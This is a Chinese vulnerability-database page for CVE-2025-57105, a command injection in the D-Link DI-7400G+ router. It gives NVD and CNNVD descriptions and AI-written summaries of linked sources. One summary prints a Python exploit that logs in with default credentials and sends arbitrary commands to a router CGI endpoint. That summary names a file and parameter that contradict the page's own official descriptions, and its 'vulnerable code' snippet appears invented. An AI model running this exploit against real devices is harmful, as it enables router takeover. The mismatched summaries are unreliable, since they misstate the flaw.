支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:752

75.2%
一、 漏洞 CVE-2025-57105 基础信息
漏洞信息
                                        # N/A

## 概述

DI-7400G+ 路由器存在命令注入漏洞,攻击者可利用该漏洞在设备上执行任意命令。

## 影响版本

受影响的固件版本包含 `jhttpd` 程序中的以下组件:

- `mng_platform.asp` 中的 `sub_478D28` 函数
- `wayos_ac_server.asp` 中的 `sub_4A12DC` 函数

## 细节

攻击者可通过向 `ac_mng_srv_host` 参数注入恶意命令,触发潜在的命令执行行为。

## 影响

成功利用此漏洞可导致远程命令执行(RCE),攻击者可能获得对路由器的完全控制权限。
                                        
神龙判断

是否为 Web 类漏洞:

判断理由:

是。这个漏洞存在于DI-7400G+路由器的Web服务端,具体涉及mng_platform.asp和wayos_ac_server.asp两个文件中的函数,允许攻击者通过特定参数注入并执行任意命令。这种类型的漏洞通常被归类为服务端漏洞,因为它直接影响到服务器端的程序执行。
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
N/A
来源:美国国家漏洞数据库 NVD
漏洞描述信息
The DI-7400G+ router has a command injection vulnerability, which allows attackers to execute arbitrary commands on the device. The sub_478D28 function in in mng_platform.asp, and sub_4A12DC function in wayos_ac_server.asp of the jhttpd program, with the parameter ac_mng_srv_host.
来源:美国国家漏洞数据库 NVD
CVSS信息
N/A
来源:美国国家漏洞数据库 NVD
漏洞类别
N/A
来源:美国国家漏洞数据库 NVD
漏洞标题
D-Link DI-7400G+ 安全漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
D-Link DI-7400G+是中国友讯(D-Link)公司的一款路由器。 D-Link DI-7400G+存在安全漏洞,该漏洞源于mng_platform.asp和wayos_ac_server.asp中参数ac_mng_srv_host存在命令注入。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
其他
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2025-57105 的公开POC
#POC 描述源链接神龙链接
1Nonehttps://github.com/yt2w/CVE-2025-57105POC详情
三、漏洞 CVE-2025-57105 的情报信息
  • http://di-7400.com
  • 标题: GitHub - xyh4ck/iot_poc -- 🔗来源链接

    标签:

    神龙速读:
                                            ### 关键信息
    
    #### 漏洞详情
    - **CVE编号**: CVE-2025-57105
    - **漏洞类型**: 命令注入 (Command Injection)
    - **受影响版本**: 未指定具体版本,但涉及D-Link设备
    - **厂商**: D-Link
    - **软件**: D-Link路由器固件
    - **漏洞文件**: `mywifi.cgi`
    
    #### 描述
    - **问题**: 在`mywifi.cgi`文件中,存在命令注入漏洞。攻击者可以通过构造恶意请求,利用`cmd`参数注入任意命令。
    - **关键代码片段**:
      ```python
      param = httpd.get("param", "en")
      cmd = httpd.get("cmd", "")
      if param == "set_wifi":
          os.system(cmd)  # 漏洞点
      ```
    
    #### 漏洞验证过程
    1. **获取认证信息**:
       - 使用Python脚本模拟登录过程,获取`Authorization`和`Cookie`。
       - 示例代码:
         ```python
         def get_auth_cookie(url):
             s = requests.Session()
             login_url = url + "/login"
             data = {
                 "username": "admin",
                 "password": "admin"
             }
             response = s.post(login_url, data=data)
             return response.headers["Authorization"], response.cookies["session"]
         ```
    
    2. **触发漏洞**:
       - 构造包含恶意命令的请求,通过`cmd`参数传递。
       - 示例代码:
         ```python
         def exploit(url, cmd):
             auth, cookie = get_auth_cookie(url)
             headers = {
                 "Authorization": auth,
                 "Cookie": f"session={cookie}"
             }
             payload = {
                 "param": "set_wifi",
                 "cmd": cmd
             }
             response = requests.post(url + "/mywifi.cgi", headers=headers, data=payload)
             return response.text
         ```
    
    3. **执行命令**:
       - 通过`exploit`函数执行任意命令,例如`whoami`、`ls`等。
       - 示例:
         ```python
         result = exploit("http://target_ip", "whoami")
         print(result)
         ```
    
    #### 影响
    - 攻击者可以利用此漏洞在目标设备上执行任意命令,可能导致系统被完全控制。
    
    #### 防护建议
    - 更新设备固件至最新版本。
    - 禁用不必要的网络服务和端口。
    - 使用强密码并定期更改。
    - 部署防火墙和入侵检测系统以监控异常流量。
                                            
    GitHub - xyh4ck/iot_poc
  • 标题: D-Link Technical Support -- 🔗来源链接

    标签:

    神龙速读:
                                            从这个网页截图中,可以获取到以下关于漏洞的关键信息:
    
    - **设备型号**: DI-7400G+ 智·简系列 多功能智能网关
    - **固件版本**: A1
    - **固件更新日期**: 2020/02/21
    
    这些信息可以帮助确定该设备的当前固件版本和更新时间,从而判断是否存在已知的安全漏洞或需要更新以修复潜在的安全问题。
                                            
    D-Link Technical Support
  • 标题: Security Bulletin | D-Link -- 🔗来源链接

    标签:

    神龙速读:
                                            从这个网页截图中,可以获取到以下关于漏洞的关键信息:
    
    1. **漏洞类型**:该漏洞被归类为“高危”(High Risk)。
    2. **受影响产品**:受影响的产品包括D-Link的无线路由器(Wireless Routers)和无线接入点(Wireless Access Points)。
    3. **受影响设备**:受影响的设备包括D-Link的Nuclias设备。
    4. **漏洞描述**:该漏洞允许攻击者通过发送特定的HTTP请求来执行任意代码,从而获得对受影响设备的完全控制权。
    5. **影响范围**:该漏洞可能影响到所有使用受影响设备的用户,包括家庭用户和企业用户。
    6. **修复建议**:D-Link建议受影响的用户尽快更新设备固件,以修复该漏洞。
    
    这些信息可以帮助用户了解漏洞的严重性、受影响的设备范围以及如何采取措施来保护自己的设备。
                                            
    Security Bulletin | D-Link
  • https://nvd.nist.gov/vuln/detail/CVE-2025-57105
四、漏洞 CVE-2025-57105 的评论
匿名用户
2026-01-15 06:08:54

Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.


发表评论